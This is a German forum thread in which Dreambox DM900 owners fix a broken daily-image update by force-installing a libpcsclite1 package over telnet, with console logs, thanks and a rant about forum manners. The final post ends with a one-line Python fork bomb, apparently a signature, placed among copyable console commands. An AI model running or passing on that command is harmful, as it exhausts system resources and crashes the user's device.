Angepinnt OE2.5: Rückmeldungen zum daily Image für DM900UHD

    • Neu

      per Konsole (Telnet) ausführen, nach jeder Zeile Enter drücken und die Ausführung abwarten:

      Quellcode

      1. cd /tmp
      2. wget feed.newnigma2.to/daily/oe2.5/deb/arm/libpcsclite1_1.8.13-r0.1_armhf.deb
      3. apt-get update
      4. dpkg --install --force-depends --force-overwrite /tmp/*.deb
      5. apt-get -y -f install
      6. apt-get autoremove
      7. up
    • Neu

      Joey schrieb:

      per Konsole (Telnet) ausführen, nach jeder Zeile Enter drücken und die Ausführung abwarten:

      Quellcode

      1. cd /tmp
      2. wget feed.newnigma2.to/daily/oe2.5/deb/arm/libpcsclite1_1.8.13-r0.1_armhf.deb
      3. apt-get update
      4. dpkg --install --force-depends --force-overwrite /tmp/*.deb
      5. apt-get -y -f install
      6. apt-get autoremove
      7. up
      Spoiler anzeigen


      *****************************
      * newnigma2.to *
      *****************************
      * the next step is done *
      *****************************

      opendreambox 2.5.0 dm900


      dm900 login: root

      ##############################################################################
      # #
      # This is a Dreambox #
      # #
      # with newnigma2.to #
      # #
      # Unauthorized access to this system is prohibited ! #
      # #
      # This system is actively monitored and all connections may be logged. #
      # By accessing this system, you consent to this monitoring. #
      # #
      ##############################################################################

      root@dm900:~$ cd /tmp
      root@dm900:/tmp$ wget feed.newnigma2.to/daily/oe2.5/deb/arm/libpcslite1.8.13r01_armhf.deb
      Connecting to feed.newnigma2.to (176.10.100.220:80)
      wget: server returned error: HTTP/1.1 404 Not Found
      root@dm900:/tmp$ wget feed.newnigma2.to/daily/oe2.5/deb/arm/libpcslite1.8.13r0.1_armhf.deb
      Connecting to feed.newnigma2.to (176.10.100.220:80)
      wget: server returned error: HTTP/1.1 404 Not Found
      root@dm900:/tmp$ wget feed.newnigma2.to/daily/oe2.5/deb/arm/libpcsclite1_1.8.13-r0.1_armhf.deb
      Connecting to feed.newnigma2.to (176.10.100.220:80)
      libpcsclite1_1.8.13- 100% |************************************************************************************************************| 14592 0:00:00 ETA
      root@dm900:/tmp$ apt-get update
      Ign feed.newnigma2.to ./ InRelease
      Ign feed.newnigma2.to ./ InRelease
      Ign feed.newnigma2.to ./ InRelease
      Hit feed.newnigma2.to ./ Release.gpg
      Hit feed.newnigma2.to ./ Release.gpg
      Hit feed.newnigma2.to ./ Release.gpg
      Hit feed.newnigma2.to ./ Release
      Hit feed.newnigma2.to ./ Release
      Hit feed.newnigma2.to ./ Release
      Hit feed.newnigma2.to ./ Packages
      Hit feed.newnigma2.to ./ Packages
      Hit feed.newnigma2.to ./ Packages
      Ign feed.newnigma2.to ./ Translation-de_DE
      Ign feed.newnigma2.to ./ Translation-de
      Ign feed.newnigma2.to ./ Translation-en
      Ign feed.newnigma2.to ./ Translation-de_DE
      Ign feed.newnigma2.to ./ Translation-de
      Ign feed.newnigma2.to ./ Translation-en
      Ign feed.newnigma2.to ./ Translation-de_DE
      Ign feed.newnigma2.to ./ Translation-de
      Ign feed.newnigma2.to ./ Translation-en
      Reading package lists... Done
      root@dm900:/tmp$ dpkg --install --force-depends --force-overwrite /tmp/*.deb
      (Reading database ... 14658 files and directories currently installed.)
      Preparing to unpack .../libpcsclite1_1.8.13-r0.1_armhf.deb ...
      Unpacking libpcsclite1 (1.8.13-r0.1) ...
      dpkg: warning: overriding problem because --force enabled:
      dpkg: warning: trying to overwrite '/usr/lib/libpcsclite.so.1.0.0', which is also in package pcsc-lite-lib 1.8.13-r0.0
      dpkg: warning: overriding problem because --force enabled:
      dpkg: warning: trying to overwrite '/usr/lib/libpcsclite.so.1', which is also in package pcsc-lite-lib 1.8.13-r0.0
      Setting up libpcsclite1 (1.8.13-r0.1) ...
      root@dm900:/tmp$ apt-get -y -f install
      Reading package lists... Done
      Building dependency tree
      Reading state information... Done
      The following package was automatically installed and is no longer required:
      pcsc-lite-lib
      Use 'apt-get autoremove' to remove it.
      0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
      5 not fully installed or removed.
      After this operation, 0 B of additional disk space will be used.
      Setting up libdbus-glib-1-2 (0.106-r0.8) ...
      Setting up python-dbus (1.2.0-r0.8) ...
      Setting up python-argparse (2.7.11-r1-nn2-1.2) ...
      Setting up enigma2 (4.3.1r9-r0-newnigma2-1.0) ...
      Setting up newnigma2-camd-oscam-modern (svn1524-r5.1) ...
      root@dm900:/tmp$ apt-get autoremove
      Reading package lists... Done
      Building dependency tree
      Reading state information... Done
      The following packages will be REMOVED:
      pcsc-lite-lib
      0 upgraded, 0 newly installed, 1 to remove and 0 not upgraded.
      After this operation, 0 B of additional disk space will be used.
      Do you want to continue? [Y/n] y
      (Reading database ... 14658 files and directories currently installed.)
      Removing pcsc-lite-lib (1.8.13-r0.0) ...
      root@dm900:/tmp$ up
      Ign feed.newnigma2.to ./ InRelease
      Ign feed.newnigma2.to ./ InRelease
      Ign feed.newnigma2.to ./ InRelease
      Hit feed.newnigma2.to ./ Release.gpg
      Hit feed.newnigma2.to ./ Release.gpg
      Hit feed.newnigma2.to ./ Release.gpg
      Hit feed.newnigma2.to ./ Release
      Hit feed.newnigma2.to ./ Release
      Hit feed.newnigma2.to ./ Release
      Hit feed.newnigma2.to ./ Packages
      Hit feed.newnigma2.to ./ Packages
      Hit feed.newnigma2.to ./ Packages
      Ign feed.newnigma2.to ./ Translation-de_DE
      Ign feed.newnigma2.to ./ Translation-de
      Ign feed.newnigma2.to ./ Translation-en
      Ign feed.newnigma2.to ./ Translation-de_DE
      Ign feed.newnigma2.to ./ Translation-de
      Ign feed.newnigma2.to ./ Translation-en
      Ign feed.newnigma2.to ./ Translation-de_DE
      Ign feed.newnigma2.to ./ Translation-de
      Ign feed.newnigma2.to ./ Translation-en
      Reading package lists... Done
      Reading package lists... Done
      Building dependency tree
      Reading state information... Done
      Calculating upgrade... Done
      0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
      root@dm900:/tmp$



      Sieht gut aus! Danke, was war denn nun der Grund für den Fehler?
    • Neu

      Gut, dass ich mal einen oder anderen Tag gewartet habe. DM900 wollte eh nicht, heute das Programm durchgezogen von unseren klugen und hilfreichen Forenjunkies! Leute, mehr Geduld, weniger Vorwürfe! Ich kann Joey und Co. verstehen, dass sie nicht so viel essen können wie sie kotzen könnten. Leute, es gab vor Jahren Foren, die hast du nicht mal so eben gefunden, wenn ja, und du hast dich gesignt, hiess das noch lange nicht, dass du alles serviert bekommen hast. Du musstest deine "Sporen verdienen". Ich bin seit Jahren mit Dream und den gängigen Foren unterwegs und hab immer tolle, hilfreiche Leute gefunden. LESEN ist eines der wichtigsten Dinge in den Foren und ehrlich, soviel Tutorials wie heute hat es vor Jahren nicht gegeben, seid dankbar dafür. Hier machen viele freiwillig studenrum Arbeit für die Allgemeinheit und ich lese mehr und mehr nur Gemecker! Scheisse, echt! Ich habe null Wissen im Gegensatz zu den "Verrückten" hier, die sich quasi opfern um der Allgemeinheit hier 'ne eigetlich schon geile Box noch zum Turbo zu machen. Helft doch mal mehr mit, lest mehr. "Bekloppte" wie Gutemine" und Co. machen einen so hammergeilen Job für lau und wir quaken nur rum. Die Admins, die Entwickler und und und, die kriegen keinen Taler, nur auf die Fresse! Ist das schön? Würdet ihr das dauerhaft ertragen wollen? NN2, IHAD, Merlin, OpenTV usw. immer das Gleiche, Mäckmäckmäck.
      Ich habe eine DM 900 gekauft, hab gelesen und die Kiste rennt. Alles von allein hinterfragt. Gelesen, gelesen, gelesen... Auch gefragt und top Antworten bekommen! Fertig! SO geht Forum gestern, heute, IMMER. Also bitte, Hirn einschlten, lesen, vernünftig fragen.....
    • Neu

      Richi207 schrieb:

      Also, habe die
      libpcsclite1_1.8.13-r0.1_armhf.deb
      auf TMP gemacht, dann
      apt-get update ; dpkg --install --force-depends --force-overwrite /tmp/*.deb ; apt-get -y -f install


      Quellcode

      1. E: Some index files failed to download. They have been ignored, or old ones use
      2. instead.
      3. (Reading database ... 17398 files and directories currently installed.)
      4. Preparing to unpack .../libpcsclite1_1.8.13-r0.1_armhf.deb ...
      5. Unpacking libpcsclite1 (1.8.13-r0.1) ...
      6. dpkg: warning: overriding problem because --force enabled:
      7. dpkg: warning: trying to overwrite '/usr/lib/libpcsclite.so.1.0.0', which is al
      8. o in package pcsc-lite-lib 1.8.13-r0.0
      9. dpkg: warning: overriding problem because --force enabled:
      10. dpkg: warning: trying to overwrite '/usr/lib/libpcsclite.so.1', which is also i
      11. package pcsc-lite-lib 1.8.13-r0.0
      12. Setting up libpcsclite1 (1.8.13-r0.1) ...
      13. Reading package lists... Done
      14. Building dependency tree
      15. Reading state information... Done
      16. 0 upgraded, 0 newly installed, 0 to remove and 7 not upgraded.
      17. 1 not fully installed or removed.
      18. After this operation, 0 B of additional disk space will be used.
      19. Setting up newnigma2-camd-oscam-modern (svn1524-r5.1) ...
      Alles anzeigen
      Edit1.: okay, nochmals "up" und es kamen noch paar updates. scheint jetzt alles zu gehen. Danke
      Danke Rchi207,

      hatte das gleiche Problem nach dem großen Update letzte Woche und hab mich jetzt einfach mal getraut, per Telnet (das erste mal!) genau so vorzugehen, wie Du beschrieben hast. Und siehe da - es hat geklappt! Ich bin ein Held ;) :)

      Danke nochmal und Grüße,
      Mibo
    • OE2.5: Rückmeldungen zum daily Image für DM900UHD

      Neu

      ManUD7 schrieb:

      Gut, dass ich mal einen oder anderen Tag gewartet habe. DM900 wollte eh nicht, heute das Programm durchgezogen von unseren klugen und hilfreichen Forenjunkies! Leute, mehr Geduld, weniger Vorwürfe! Ich kann Joey und Co. verstehen, dass sie nicht so viel essen können wie sie kotzen könnten. Leute, es gab vor Jahren Foren, die hast du nicht mal so eben gefunden, wenn ja, und du hast dich gesignt, hiess das noch lange nicht, dass du alles serviert bekommen hast. Du musstest deine "Sporen verdienen". Ich bin seit Jahren mit Dream und den gängigen Foren unterwegs und hab immer tolle, hilfreiche Leute gefunden. LESEN ist eines der wichtigsten Dinge in den Foren und ehrlich, soviel Tutorials wie heute hat es vor Jahren nicht gegeben, seid dankbar dafür. Hier machen viele freiwillig studenrum Arbeit für die Allgemeinheit und ich lese mehr und mehr nur Gemecker! Scheisse, echt! Ich habe null Wissen im Gegensatz zu den "Verrückten" hier, die sich quasi opfern um der Allgemeinheit hier 'ne eigetlich schon geile Box noch zum Turbo zu machen. Helft doch mal mehr mit, lest mehr. "Bekloppte" wie Gutemine" und Co. machen einen so hammergeilen Job für lau und wir quaken nur rum. Die Admins, die Entwickler und und und, die kriegen keinen Taler, nur auf die Fresse! Ist das schön? Würdet ihr das dauerhaft ertragen wollen? NN2, IHAD, Merlin, OpenTV usw. immer das Gleiche, Mäckmäckmäck.
      Ich habe eine DM 900 gekauft, hab gelesen und die Kiste rennt. Alles von allein hinterfragt. Gelesen, gelesen, gelesen... Auch gefragt und top Antworten bekommen! Fertig! SO geht Forum gestern, heute, IMMER. Also bitte, Hirn einschlten, lesen, vernünftig fragen.....


      Du sprichst mir aus der Seele! Vielleicht noch ein Zusatz: ALLE sollten versuchen, einen respektvollen Umgang resp. Sprache miteinander zu pflegen.
    • OE2.5: Rückmeldungen zum daily Image für DM900UHD

      Neu

      Mausi schrieb:

      Die .deb Datei nach /tmp auf die DM900 kopieren
      Link :
      feed.newnigma2.to/daily/oe2.5/…te1_1.8.13-r0.1_armhf.deb

      Dann über die Konsole ( Telnet )
      die Befehle einzeln eingeben !

      apt-get update

      dpkg --install --force-depends --force-overwrite /tmp/*.deb

      apt-get -y -f install

      apt-get autoremove

      up


      Perfekt. Mit dieser Beschreibung habe ich das Upgrade auf meiner dm 525 durchgeführt. Danke. Musste anschließend noch eine Manuelle Eingabe über Telnet durchführen, die auf dem Bildschirm beschrieben war und danach war die dm einsatzbereit
    • OE2.5: Rückmeldungen zum daily Image für DM900UHD

      Neu

      ManUD7 schrieb:

      Gut, dass ich mal einen oder anderen Tag gewartet habe. DM900 wollte eh nicht, heute das Programm durchgezogen von unseren klugen und hilfreichen Forenjunkies! Leute, mehr Geduld, weniger Vorwürfe! Ich kann Joey und Co. verstehen, dass sie nicht so viel essen können wie sie kotzen könnten. Leute, es gab vor Jahren Foren, die hast du nicht mal so eben gefunden, wenn ja, und du hast dich gesignt, hiess das noch lange nicht, dass du alles serviert bekommen hast. Du musstest deine "Sporen verdienen". Ich bin seit Jahren mit Dream und den gängigen Foren unterwegs und hab immer tolle, hilfreiche Leute gefunden. LESEN ist eines der wichtigsten Dinge in den Foren und ehrlich, soviel Tutorials wie heute hat es vor Jahren nicht gegeben, seid dankbar dafür. Hier machen viele freiwillig studenrum Arbeit für die Allgemeinheit und ich lese mehr und mehr nur Gemecker! Scheisse, echt! Ich habe null Wissen im Gegensatz zu den "Verrückten" hier, die sich quasi opfern um der Allgemeinheit hier 'ne eigetlich schon geile Box noch zum Turbo zu machen. Helft doch mal mehr mit, lest mehr. "Bekloppte" wie Gutemine" und Co. machen einen so hammergeilen Job für lau und wir quaken nur rum. Die Admins, die Entwickler und und und, die kriegen keinen Taler, nur auf die Fresse! Ist das schön? Würdet ihr das dauerhaft ertragen wollen? NN2, IHAD, Merlin, OpenTV usw. immer das Gleiche, Mäckmäckmäck.
      Ich habe eine DM 900 gekauft, hab gelesen und die Kiste rennt. Alles von allein hinterfragt. Gelesen, gelesen, gelesen... Auch gefragt und top Antworten bekommen! Fertig! SO geht Forum gestern, heute, IMMER. Also bitte, Hirn einschlten, lesen, vernünftig fragen.....


      Du hast verdammt recht!
    • Neu

      Hallo Leute, bitte verzeiht, wenn ich viel von dem hier gesagten nicht eindeutig nachvollziehen kann.
      Vielleicht hat jemand ne einfache Lösung für mich,
      wie ich wieder HD+ nach dem eben getätigten Update bei meiner DM 900UHD sehen kann.

      Was hab ich gemacht:
      Habe eben das Aktuelle Update vollzogen, kurz vor Ende erhielt ich die Fehlermeldung (Bild unten)
      deshalb deinstallierte ich osccam-modern
      danach fuhr ich das Update erfolgreich durch
      jetzt wollte ich das oscam-modern wieder neu installieren
      beim Installierungsversuch bekomme ich jetzt die Meldung, das es nicht Erfolgreich war (Bild2)
      Das andere angebotene cam GBox811k lies sich zwar installieren, doch HD+ bleibt dunkel.

      Gibt es eine Lösung, ohne direkt in die Eingeweide der Box zu gehen? Oder eine andere Möglichkeit die HD+ Sender wieder sichtbar zu machen?
      Danke für Eure Mühe!
      Bilder
      • OSCam.jpg

        164,83 kB, 1.280×720, 17 mal angesehen
      • OSCam2.jpg

        134,5 kB, 1.280×720, 21 mal angesehen

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von gordian ()

    • Neu

      Hallo, Guten morgen :)
      Danke für die so frühe Antwort.
      Ja, jedoch liegt genau dort der Knackpunkt.
      Ich habe bisher zwar schon mit File Zilla einige Dateien hin und her geschoben, jedoch nicht mehr.
      Gibt es Hoffnung, das die Geschichte bei einem nächsten Update gefixt wird, oder komm ich nicht drum herum ins Eingemachte zu gehen?
      Welches Programm für Win10 wäre dann optimal dafür? Ich hab zwar gesehen, das ich den Client in win 10 aktivieren kann,
      und dann mit der Eingabeaufforderung das ganze starten kann,
      wie ich dann aber in die Box komme und diese Zeilen ausführen kann ist noch fleißige Lernarbeit, die ich bisher leider nicht tätigte, um nichts am Gerät zu verbiegen.
      Würde auch gern einen Ausgeben, wenn es einen einfacheren Weg zum Glück gibt.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von gordian ()

    • Neu

      1. Um es mal zu verdeutlichen es gibt 2 Pakete mit dem selben inhalt das eine Paket ist von unserem feed und wird gebraucht fürs update das andere habt ihr extern installiert.Um das Problem zu lösen muss das alte weg entweder durch deinstallieren oder überschreiben das machen diese befehle.Was lernen wir daraus nur eine Paketquelle verwenden und wenn eines fehlt melden und nicht irgendwo herladen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !